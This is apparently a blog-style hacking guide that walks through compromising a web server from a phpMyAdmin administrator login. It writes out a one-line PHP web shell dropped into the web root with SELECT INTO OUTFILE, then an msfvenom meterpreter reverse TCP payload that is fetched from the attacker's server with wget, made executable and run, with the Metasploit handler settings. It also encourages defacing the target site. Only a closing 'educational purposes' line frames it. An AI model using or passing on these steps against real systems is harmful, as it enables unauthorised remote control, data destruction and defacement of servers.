Backdoor with phpMyAdmin

“Scenario” So, you found your“targets” website, but you notice it isn’t much you can work with here. Using a URL Fuzzer, you found a “phpMyAdmin” path and surprisingly the admin used a weak password (Or some other method).

You’re logged into phpMyAdmin with the administrator account, head over to the SQL Tab “This will let you run SQL query/queries on the server”and use this code “Or any code of your choice!” and press go.

SELECT "<?php echo '<pre>';echo shell_exec($_REQUEST['mrjsec']);echo '</pre>'; ?>"
INTO OUTFILE '/var/www/html/name.php'

Now go to your .php file (URL Wise) in this scenario I have named it name.php

You won’t see anything on this page “that’s normal, were all empty inside!”, Now here’s the magic part. At the end of the .php URL path add this “?mrjsec=*Your command here*, now you have a shell within the server, where you can call commands such as ls, whoami, rm, wget and so on etc.

And from here you can even deface the site if that’s what you want. And that ends that!

Or maybe you want to go further and get a Metasploit reverse TCP shell on the system itself?

Now we’re taking! First, we need to identify what operating system is running could be Linux or windows. However, in this scenario it’s Linux, and you can find this out by merely performing “?mrjsec=uname – this return “Linux4.4.0-140-generic x86_64 x86_64 x86_64 GNU/Linux”.

Now it’s time to craft the Metasploit payload using msfvenom if you’re unsure what payload you would need just run “msfvenom –list payloads” this will show all the available payloads, just pick the one you need.

“Since this scenario is basedaround Linux, I will keep it Linux based, just remember there are so many different opportunities. Always think outside the box!”

Create the payload you need.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=.31 LPORT=5721 -f elf > file

Now you will need to upload it somewhere that offers direct downloading, in this scenario the attacker has apache2 installed and will be hosting the file from their own server.

Go back to the target and using the first shell, we will use wget to get our shell onto the system.

Using the “ls” command we can see the file is in place, now we just need to make it executable simply by using chmod

name.php?mrjsec=chmod +x file

Before we even run the file, let’s make sure our Metasploit handler is running and configured correctly.

use exploit/multi/handler

And don’t forget to set the Payload, LHOST and RHOST!

set payload linux/x86/meterpreter/reverse_tcp
set LHOST .31
set LPORT 5721

You can use “show options” this will show you what settings are required for this payload (or any others.)

Now just run exploit, and we can leave it. Or if you wish to background it just do exploit -j

Back onto the targets site, we just need to run the file. From the URL we import “./file” and that’s it.

And if we head back toour Metasploit, we can see our file was a success, and we now have a better foothold within the system. What you do from here is your business.

But for me… I think a better-looking homepage is needed!

…. Well, I think it’s better anyway….

I hope you have enjoyed my little guide here, remember this guide won’t work 100% So, play around with it, and always think outside the box.

-MrJSec ❤
“Made for educational purposes Only.”

Leave a Comment

Your email address will not be published. Required fields are marked *